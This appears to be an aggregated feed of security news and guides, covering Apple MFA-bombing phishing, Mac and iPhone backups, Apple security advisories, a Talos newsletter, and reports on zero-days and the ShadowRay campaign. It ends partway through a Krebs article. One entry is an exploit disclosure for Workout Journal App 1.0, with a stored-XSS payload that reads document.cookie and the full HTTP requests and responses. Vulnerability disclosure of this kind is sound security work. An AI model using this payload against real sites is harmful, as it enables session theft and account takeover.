Cybercriminals have taken MFA bombing to the next level by calling victims of an attack from a spoofed Apple Support number.

Simply put, MFA bombing (also known as “push bombing” or “MFA fatigue”) is a brute force attack on your patience. Cybercriminals use MFA bombing to break into accounts that are protected by multi-factor authentication (MFA).

MFA normally requires a user to enter a six-digit code sent by SMS, or generated by an app, or to respond to a push notification, when they enter a username and password. It provides an enormous increase in security and makes life much harder for criminals.

Because it’s so hard to break, criminals have taken to getting users to defeat their own MFA. They do this by using stolen credentials to try logging in, or by trying to reset a user’s password over and over again. In both cases this bombards the user with push notifications asking them to approve the login, or messages asking them to change their password. By doing this, the criminals hope that users will either tap the wrong option or get so fed up they just do whatever the messages are asking them to do, just to make the bombardment stop.

Now, according to this blog by Bran Krebs, these attacks have evolved. If you can withstand the pressure of the constant notifications, the criminals will call you pretending to come to your rescue.

In one example Krebs writes about, criminals flooded a target’s phone with password reset notifications for their Apple ID. Each notification required the user to choose either “Allow” or “Don’t Allow” before they could go back to using their device.

After withstanding the temptation to click “Allow”, and declining “100-plus” notifications, the victim receved a call from a spoofed number pretending to be Apple Support.

The call was designed to get the victim to trigger a password reset, and then to hand over the one-time password reset code sent to their device. Armed with a reset code, the criminals could change the victim’s password and lock them out of their account.

Luckily, in this situation the victim thought the callers seemed untrustworthy, so he asked them to provide some of his personal information, and they got his name wrong.

Another victim of MFA bombing learned that the notifications kept coming even after he bought a new device and created a new Apple iCloud account. This revealed that the attacks must have been targeted at his telephone number, because it was the only constant factor between the two device configurations.

Yet another target was told by Apple that setting up an Apple Recovery Key for his account would stop the notifications once and for all, although both Krebs and the victim dispute this.

Unfortunately, there doesn’t seem to be a lot you can do once an MFA bombing attack starts other than be patient, and be careful not to click Allow. If you get a call, know that Apple Support will never call you out of the blue, so don’t trust the caller, no matter how convenient their timing.

If you lose control of your Apple ID, go to iforgot.apple.com to start the account recovery process.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 MFA bombing taken to the next level 

Backing up your Mac is a simple process that can save your most important files from cyberthreats.

Backing up your Mac computer doesn’t need to be intimidating.

By taking advantage of a user-friendly feature released by Apple several years ago, the entire backup process can be handled almost automatically, preserving your most important files, photos, applications, and emails from cyberthreats and mishaps.

Before starting the backup process, **you will** **need an external storage device** that can connect to your Mac with a USB or Thunderbolt cable. External storage devices, which are sometimes called external hard drives, are developed and sold by many different companies, including Lacie, SanDisk, and Western Digital.

If you do not have an external storage device, you must first get one. You should also follow Apple’s recommendation that your external storage device be **twice as large** as the hard drive of your Mac computer.

To find the hard drive size of your current Mac, open the **System Settings** app on your computer. On the left-hand rail, click **General** and then, in the window open to the right, click **Storage**.

Several statistics and options will be shown.

At the top of the Storage section, the hard drive space is shown. Here, it is 494.38 GB, or 500 GB roughly.

The Mac shown here has 500 GB of internal storage. If we were to back this Mac up, we would need to use an external storage device of 1 TB (terabyte).

Once you have your external storage device, you can begin the actual backup processs.

The simplest way to back up your Mac is with the built-in feature “**Time Machine**.”

First, connect your external storage device to your Mac.

Then, you need to set up that storage device as your “backup disk.” This means that, from this point forward, your external storage device will have one primary use, and that is as a backup device that syncs with Time Machine. Apple recommends that you **do** **not** use your external storage device that you are using with Time Machine for anything other than Time Machine backups.

To set up your storage device as your backup disk, follow these instructions:

Go to **System Settings**.  

Click on **General** in the left sidebar.

From here, click on **Time Machine** in the main window displayed to the right.

From the **Time Machine** menu, click **Add Backup Disk** or click the “Add” button (+).

From here, select your external storage device and then click **Set Up Disk**.

At this point in the process, you may receive two options from Time Machine:

1.  If your device has other files on it, you will be asked if you want to erase the device so that it can be used solely as a backup with Time Machine. You can erase the files immediately and then continue the backup process through Time Machine. If you do not want to erase the files, you need to get a separate external storage device that will be used exclusively as a backup with Time Machine.
2.  If your external storage device already has backups from a prior computer, you will be asked whether you can to keep those backups and roll them into new backups made with Time Machine. This is up to you.

From here, the backup process is nearly done.

To make a backup, simply click on **Back Up Now** from the Time Machine menu.

Your first backup could take a long time to complete, but know that you can continue using your computer like normal while the process happens in the background.

From here on, whenever you attach your external storage device to your Mac, Time Machine will automatically ask to make a backup of the changes to your Mac. You can also change the frequency of your backups in your Time Machine Settings.

 How to back up your Mac 

An easy-to-understand guide on how to backup your iPhone or iPad to iCloud automatically.

They say the only backup you ever regret is the one you didn’t make. iPhone backups can be used to easily move your apps and data to a new phone, to recover things you’ve lost, or to fix things that have failed.

The most convenient way to backup your iPhone is to have it backup to iCloud. Backups are made every day, automatically, provided your phone is connected to power and locked. Be aware though that backups take take up a lot of your iCloud storage, and your phones’ data plan if you choose to backup when you aren’t connected to Wi-Fi. If those are likely to be problems for you, you might prefer to backup your iPhone to your Mac.

This guide tells you how to enable backups to iCloud, and how to check that everything is working as you expect.

Open the **Settings** app.

Then tap where you see your name and **Apple ID, iCloud+, Media & Purchases**.

Next, tap **iCloud**.

Scroll down and tap **iCloud Backup**.

Toggle **Back Up This iPhone** to on.

This may reveal a **Back Up Over Cellular Data** or **Back Up Over Mobile Data** toggle. This creates backups when you aren’t connected to Wi-Fi. Because backups can use a lot of data, toggling this on may cause you to exceed your data plan.

Once you have made a backup, you can access it from this screen under **ALL DEVICE BACKUPS**.

You can return to the previous screen by tapping the **< iCloud** link at the top. This screen shows you how much storage space your backups are using. To see a little more detail, tap **Manage Account Storage**.

Scroll down the list of apps until you see **Backups** to see how much storage your backups are using.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 How to back up your iPhone to iCloud 

Apple Security Advisory 03-25-2024-1 - Safari 17.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-1 Safari 17.4.1

Safari 17.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214094.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebRTC  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

Safari 17.4.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPKcACgkQX+5d1TXa  
IvpFfBAAvnUeX8jpQu9uS+hiv0FKFu/YUSafIVOutV2ls8jQbdd3HVKwIRNmTZ4g  
0u7drE/D9mTBMzfmvdyNKk4lrnsvgJYNgurGPudpqDr7LmzkDdn0DOWL5xxSs7Jx  
ekUxjtHiPtEPMs41gs9ZZMHiMhU/r6G9LaTa2WrRcrBeqkLnepmee9RfrSbXDV5q  
NMGio6W95JWgRLM0+c06Jk/A6VhnrxwqFug9NMDXr/EgxxMjG5mxZKY7qXXUcWe+  
D2CI/1SRI0ucAkIKN5IDFY5X4Y/XWvp8YeVqdtQQ6RmfJDEE9zPRFSlr/PKRFnba  
LfEPFzWCDMZ6qqP9eSph7+8wFLngWwksf0O9xBq6KF+LUqIVb9RkJ1VZnYZluTt4  
tT161H0aTHOq9LhcFbAA5kQbdpfX7aulYq1xkaGz1a2KJxYFmr1p26Q7HMWHw5Zz  
BlnRH4xsQkoKaU96WSylDUdO5DYiQ27cRQddvqP40xIOTaK/SBTUlEYDCviU+8Xs  
1KhLmuSgfnra+akn0vCmy5tu/+DzlmUT4kvJsvcOApDyKtoeSzPUYucw65RrcEo3  
Aa/3eT3R8o9S8mdq6c3OIEF16/2IyxT9fJJE0YeQTli8zmkTu0Pw0RG2DzQhnfI6  
lDKmfx3c1PyCOU3By0XIfqsI9t3oWXcvbAgSgnDC6lmnZ7X2KpY=  
=JCdc  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-1

Apple Security Advisory 03-25-2024-2 - macOS Sonoma 14.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-2 macOS Sonoma 14.4.1

macOS Sonoma 14.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214096.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

WebRTC  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

macOS Sonoma 14.4.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPIQACgkQX+5d1TXa  
IvrgbRAAg4RSaUphmr+xku+UTKjqN9BQU8fRYd+5UsN1x2DGTznnh1CIJrLi9XdM  
SkvIz076B9mtB0wlL6E7YCW4on5GXnvRt8OclNBjstjaxUZoqqeT0fs7KrKCm1WV  
fX7qcbIXo73cwzA7j/VoOtDCQr0aXAjBJv4zoIOERwAXw/BwJa8i9VZCeQT3RJr7  
Ww1EhYxfT1/XJhVk2rlTXLOBdL4FetbMNfENt8SozkUBTtOmU3BZeRDZ08RWpTn8  
nh+PKzrwmo+ayY8UcPZPcnrhw1fP8div1CIJc2v1AGnwr1rAzEbucJS4oQheT8SR  
8RhIYUCllkWkHzNTvAOJFc1K4clLPcAu1SG1+K7QPcpXJbMsKAybUGl+GOGbqvO8  
Dm3RHGU8BFgWKTAqDwUGzOs0GdaS/fmpRms+S22HlHx0/Z9kFA3lXEqAiVcxpVq8  
6RPJQiYsp7UBRFlCMx0X5bwCCLSaPPaGgJbWTcx3EaVlOXvUGyHaLcwmZUzicGCu  
GP5GHBjHgINslfm/lYLbUX2BPtT+Sed9VYojNs1ehGSLazpwgFVElpSou0OytxaK  
7mxU+ABDC3L7vn8QBX8ofF1EH/g57CMTKQlJDdVmsDaBmtY/LkOeSay5Zmr3qHDf  
RUFjjsxZltBKwnCQJBbViMbqJKwSdsuhHPSmVxBV0HGY9xiWUqc=  
=W3BD  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-2

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day...

Thursday, March 28, 2024 10:00

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day, will I be the teacher that just rolls in the TV cart and delivers the single greatest blast of freedom that you can have in a classroom, or will I be the teacher that strolls into your 4th grade class and is appalled that you aren’t already conversant in Dostoevsky? Neither. Today I will be the old wizened oracle offering advice and attempting to answer one of the most asked questions I receive at public speaking engagements. So pull up a desk and don’t make that high pitched sound with a wet finger on the basket underneath the seat, because I know the old magicks.  

The number one question that I field after public speaking is “Why did they let you out of your cage to talk to normal people?” and honestly, I don’t really have an answer I just hope that no one notices. The next question is invariably a variation of “How did you become a threat hunter?”, “How do I get a job in cyber security?”, “How do I get a gig within Talos?” The answer is simply – be curious. Intellectual curiosity is the key. I’ll take it a step further when talking specifically about Talos and quote Walt Whitman (via Ted Lasso) and say, “Be curious, not judgmental” because being a positive part of the culture is as important as the deep arcane knowledge and skills that you need to get your foot in the door at Talos.  

There are a lot of paths that you can take in security and the various skill sets along each path vary but curiosity will carry you through each one. A lot of people will tell you to follow your passion and I will vehemently disagree; I will say to follow your aptitude. As you learn and grow within the field, you’ll find that some things come easily, don’t fight the wind in that scenario be the willow. If you are extremely early in your journey, find the helpers. There are tons of super helpful people, sites, and resources available to get you started and finding them is easy if you are curious. Attend a BSides or local security group like AHA. Install Snort and start learning what traffic looks like on the wire and create custom signatures. Install Kali and break things, in your own environment please. Combine the two and see where it will take you. If you are further along in your journey and are interested in taking the next step from analyst to malware research or reverse engineering, you can start with hasherezade's 1001 nights and see if you have the aptitude to follow that path. Don’t be afraid to try something and fail. Don’t expect to be good from the start. Don’t be afraid to ask questions and admit that you don’t know something – the most important things I’ve picked up usually come from “I don’t know, could you teach me?”.  

In the end there are truly almost as many paths as there are people doing the jobs. It’s crazy how varied the backgrounds on our teams are but curiosity is rampant.  

**The one big thing **

The one big thing is that clearly, I’m substituting, and all is normal in the security world. Vulns continue to be exploited, security vendors continue to be consolidated, and everything is as it was in the world. THISISFINEDOTGIF.  

**Why do I care? **

Because it’s what keeps us up at night. That and a warm cup of Liber-Tea.  

**So now what? **

Now we deliver Managed Democracy on Hell Divers 2 – together.  

**Top security headlines of the week **

A newly discovered vulnerability baked into Apple’s M-series of chips allows attackers to extract secret keys from Macs when they perform widely used cryptographic operations, academic researchers have revealed in a paper published Thursday. (Ars Technica, Wired    

Metasploit has announced the release of Metasploit Framework 6.4 which features several improvements and a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. (Rapid 7) 

**Can’t get enough Talos? **

*   Cisco Closes $28B Splunk Deal: 5 Big AI, Security And Partner Things To Know 
*   Beers With Talos: The old people episode 
*   Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86   
**Typical Filename:** endpoint.query   
**Claimed Product:** Endpoint-Collector   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc

Enter the substitute teacher

By Waqas
Google’s Threat Analysis Group (TAG) reports a concerning rise in zero-day exploits and increased activity from state-backed hackers.…
This is a post from HackRead.com Read the original post: Google TAG Reports Zero-Day Surge and Rise of State Hacker Threats

Google’s Threat Analysis Group (TAG) reports a concerning rise in zero-day exploits and increased activity from state-backed hackers. This highlights the growing cybersecurity threats to businesses and individuals.

In an overview of cybersecurity threats, Google’s Threat Analysis Group (TAG) and **Google-owned Mandiant** disclosed 97 zero-day vulnerabilities exploited in the wild last year. That’s a score well above and significantly more than 50% of the 62 seen the year before but still comes in below the record 106 exploits in 2021.

It also indicated that among the 30 reported critical vulnerabilities, 29 were made by TAG and Mandiant, showing how much of a risk there is from threats that are not yet fixed. As per Google’s **blog post**, in its report, Google’s TAG researchers divided vulnerabilities into two categories: one targeting end user-based platforms and products, including iOS and Android devices and browsers, while the other targeted those technologies focused on enterprise-level solutions, such as security software.

One of the key trends pointed out in the report is the continued determination of the **threat from state-sponsored actors**, more so from the People’s Republic of China (PRC). A notable portion of the exploits were attributed to 12 zero-day vulnerabilities linked to the PRC by cyber-espionage groups, compared with seven the previous year.

The **report** emphasizes the changing tactics by threat actors, with an increase in targeting levels for technologies specific to the enterprise. According to Google, the trend of cyberattacks against corporate infrastructure continues to rise after the company recorded a 64% surge in the exploitation of technologies specific to the enterprise over the past year.

Most interestingly, these results also point to a shift in focus toward the exploitation of vulnerabilities in third-party components or libraries, which enlarge the overall attack surface for threat actors.

Among the positives, the report points out: that there are big investments from major platform vendors like **Apple**, **Google**, and **Microsoft** to make the security apparatus even better. The investment has also paid off, with few vulnerabilities observed in first-party code and mitigations improving against the worst attacks.

Finally, the report provides practical recommendations for how both individuals and businesses can improve their security situation. Other key recommendations brought out in the report are the adoption of transparency with timely disclosure, prioritizing threat mitigation strategies, and the solid building of security foundations.

> _“Evolving cyber threats will be responded to through enhanced collaboration and vigilance to protect the digital ecosystem. Google works on ongoing research with its expertise in the ever-growing need for collective resilience to threats.”_
> 
> Google

There’s much more in the **report** (PDF) the company published earlier today.

****Don’t Forget Ethical Hackers****

While Google’s TAG report focuses on the efforts of major technology companies in identifying security vulnerabilities, it’s important to acknowledge the vital role played by ethical hackers, also known as white hat hackers. These individuals contribute greatly to the cybersecurity community by legally working with organizations to discover flaws in their systems.

The impact of ethical hackers is further highlighted by a February 2024 Surfshark **report** analyzing HackerOne bug bounty program data. This report reveals that ethical hackers were able to identify a large number of vulnerabilities (835) across various websites (105). These valuable contributions not only helped to secure these platforms but also generated significant earnings (€417,000) for the hackers through **bug bounty programs**.

1.  Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks
2.  Microsoft Office Most Exploited Software in Malware Attacks
3.  AI Flagged as “Chronic Risk” in UK Govt’s Risk Register Report
4.  Flashpoint Uncovers 100,000+ Hidden Flaws, Including 0-Days
5.  NIST Releases Cybersecurity Framework 2.0: Guide for All Orgs

Google TAG Reports Zero-Day Surge and Rise of State Hacker Threats

By Waqas
An unpatched vulnerability is exposing the Ray AI framework to the "ShadowRay" attack!
This is a post from HackRead.com Read the original post: New ShadowRay Campaign Targets Ray AI Framework in Global Attack

Discover the ShadowRay campaign exploiting CVE-2023-48022 in the Ray AI framework, risking thousands of companies. Attackers hijack resources, mine crypto, and steal data, impacting education, finance, and healthcare. Major users include Uber, Amazon, and Netflix – Urgent patch advised.

Recent revelations from the Oligo research team have shed light on a troubling development in cybersecurity. Dubbed “ShadowRay” by the researchers, it represents the first documented instance of an active attack campaign targeting AI workloads within the widely utilized Ray open-source AI framework.

****CVE-2023-48022****

The core of the issue lies in a critical vulnerability, known as CVE-2023-48022, which has been a subject of contention and remains unpatched. This vulnerability exposes thousands of companies and their AI infrastructure to exploitation, allowing malicious actors to hijack computing resources and potentially leak sensitive data.

Shockingly, this security vulnerability has been actively exploited for the past seven months, impacting various sectors including education, cryptocurrency, and biopharma.

According to the technical findings stated in Oligo Security’s blog post shared with Hackread.com ahead of publication on Tuesday, the exploit has led to the compromise of numerous Ray servers worldwide.

These compromised machines, some of which have been under attack for over half a year, pose a significant threat to the integrity and security of sensitive data. Attackers have been able to obtain valuable insights from command history stored on these machines, potentially exposing critical production secrets.

> _“As of now, Oligo has found hundreds of compromised clusters. Each cluster consists of many nodes, which are machines connected to the cluster over the network. Most nodes have GPUs, which are leveraged by attackers for cryptocurrency mining, making this infrastructure an even bigger target for attacks. In other words, attackers choose to compromise these machines not only because they can obtain valuable sensitive information, but because GPUs are very expensive and difficult to obtain, especially these days.”_
> 
> Oligo Security

****Who Uses Ray?****

Currently, Ray boasts 30,000 stars on GitHub, indicating a feature enabling users to bookmark repositories of interest or utility, akin to “liking” content on social media platforms.

Furthermore, Ray finds application in production environments across some of the globe’s leading organizations, such as Ant Group, an affiliate company of the Chinese conglomerate Alibaba Group, Uber, Amazon, LinkedIn, Doordash, Netflix, Spotify, Pinterest, and OpenAI, etc.

******Expert Weighing In******

John Bambenek, President at Bambenek Consulting, emphasized the inherent challenges in defending against such attacks, particularly within AI environments. He highlighted the ongoing struggle to establish robust threat detection mechanisms, noting that the current landscape lacks comprehensive visibility. With attackers increasingly targeting data-rich environments, the need for proactive measures to safeguard AI workloads has never been more pressing.

_“_AI has been sprung on environments and we are still struggling with getting basic frameworks in place to start detecting threats and attacks. We have pieces, however, there is no way to know if this is the first attack as we still lack a notion of how to get complete visibility. That said, it’s clear attackers know full well this is a blind spot and anything with lots of data will be attractive targets._“_

As organizations grapple with the implications of ShadowRay, caution and proactive security measures are important. The Oligo research team has urged all entities utilizing Ray to conduct thorough reviews of their environments, identify any potential vulnerabilities, and remain vigilant for signs of suspicious activity.

In today’s world, where data is incredibly valuable, it’s more crucial than ever to protect against the constantly changing dynamics of cybersecurity threats.

1.  NIST Cybersecurity Framework 2.0: Guide for All Orgs
2.  AI Scams, Human Trafficking Fuel Global Cybercrime Surge
3.  Linux, Windows, macOS Hit By “Alchimist” Attack Framework
4.  ChatGPT Plugins Exposed to Critical Flaws, Risked User Data
5.  Flaws in QuickBlox Framework Expose Millions of User Records

New ShadowRay Campaign Targets Ray AI Framework in Global Attack

Several Apple customers recently reported being targeted in elaborate phishing attacks that involve what appears to be a bug in Apple's password reset feature. In this scenario, a target's Apple devices are forced to display dozens of system-level prompts that prevent the devices from being used until the recipient responds "Allow" or "Don't Allow" to each prompt. Assuming the user manages not to fat-finger the wrong button on the umpteenth password reset request, the scammers will then call the victim while spoofing Apple support in the caller ID, saying the user's account is under attack and that Apple support needs to "verify" a one-time code.

Several **Apple** customers recently reported being targeted in elaborate phishing attacks that involve what appears to be a bug in Apple’s password reset feature. In this scenario, a target’s Apple devices are forced to display dozens of system-level prompts that prevent the devices from being used until the recipient responds “Allow” or “Don’t Allow” to each prompt. Assuming the user manages not to fat-finger the wrong button on the umpteenth password reset request, the scammers will then call the victim while spoofing Apple support in the caller ID, saying the user’s account is under attack and that Apple support needs to “verify” a one-time code.

Some of the many notifications Patel says he received from Apple all at once.

**Parth Patel** is an entrepreneur who is trying to build a startup in the conversational AI space. On March 23, Patel documented on Twitter/X a recent phishing campaign targeting him that involved what’s known as a “push bombing” or “MFA fatigue” attack, wherein the phishers abuse a feature or weakness of a multi-factor authentication (MFA) system in a way that inundates the target’s device(s) with alerts to approve a password change or login.

“All of my devices started blowing up, my watch, laptop and phone,” Patel told KrebsOnSecurity. “It was like this system notification from Apple to approve \[a reset of the account password\], but I couldn’t do anything else with my phone. I had to go through and decline like 100-plus notifications.”

Some people confronted with such a deluge may eventually click “Allow” to the incessant password reset prompts — just so they can use their phone again. Others may inadvertently approve one of these prompts, which will also appear on a user’s Apple watch if they have one.

But the attackers in this campaign had an ace up their sleeves: Patel said after denying all of the password reset prompts from Apple, he received a call on his iPhone that said it was from Apple Support (the number displayed was 1-800-275-2273, Apple’s real customer support line).

